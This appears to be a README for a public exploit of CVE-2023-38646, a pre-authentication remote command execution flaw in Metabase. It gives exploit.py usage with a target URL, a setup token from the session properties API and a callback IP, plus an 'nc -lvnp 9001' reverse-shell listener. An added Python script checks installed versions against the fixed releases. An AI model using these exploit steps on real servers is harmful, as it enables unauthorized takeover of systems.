junnythemarksman / CVE-2023-38646

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 (Metabase Pre-Auth RCE)

Example usage

Open two terminals.

Terminal 1:

python3 exploit.py -u http://vulnerablewebsite.com -t "537up-70k3n-fr0m-4p1-535510n" -i 10.10.10.10 -p 9001

where:
-u: the URL for the vulnerable website
-t: the setup token taken from http://vulnerablewebsite.com/api/session/properties
-i: host IP address (your IP address)
-p: host port for connection 

Terminal 2:

nc -lvnp 9001
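
To check whether a deployment is still on an affected release, the fixed versions listed in the description can be turned into a patch-level check. The following is an added example, not part of this repository's code; the function names, the sample inventory and the rule that later builds on a patched release line keep the fix are assumptions.

```python
import re

# Fixed releases from the advisory text above, keyed by (edition, release line).
# Edition 0 is open source, edition 1 is Enterprise.
FIXED = {(ed, line): (ed, line, patch, build)
         for ed in (0, 1)
         for line, patch, build in ((43, 7, 2), (44, 7, 1), (45, 4, 1), (46, 6, 1))}

def parse_version(tag):
    """Turn 'v0.46.6' or '1.45.4.1' into a zero-padded 4-tuple of ints."""
    m = re.fullmatch(r"v?(\d+(?:\.\d+){1,3})(?:[-+].*)?", tag.strip())
    if not m:
        raise ValueError(f"unrecognised Metabase version tag: {tag!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    return tuple(parts + [0] * (4 - len(parts)))

def is_affected(tag):
    """True if the version predates the fix for its release line."""
    v = parse_version(tag)
    edition, line = v[0], v[1]
    if edition not in (0, 1):
        raise ValueError(f"unknown edition prefix in {tag!r}")
    if line > 46:
        return False          # not "before x.46.6.1"
    fixed = FIXED.get((edition, line))
    if fixed is None:
        return True           # older line with no fixed release listed
    return v < fixed          # assumption: later builds on a line keep the fix

def audit(inventory):
    """Return the sorted host names whose Metabase version still needs an upgrade."""
    return sorted(host for host, tag in inventory.items() if is_affected(tag))

if __name__ == "__main__":
    # Constructed inventory for illustration; host names are hypothetical.
    sample = {"bi-prod": "v0.46.6", "bi-stage": "v0.46.6.1",
              "bi-ee": "v1.45.4", "bi-legacy": "v0.42.4", "bi-new": "v0.47.0"}
    for host in audit(sample):
        print(f"{host}: upgrade required ({sample[host]})")
```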
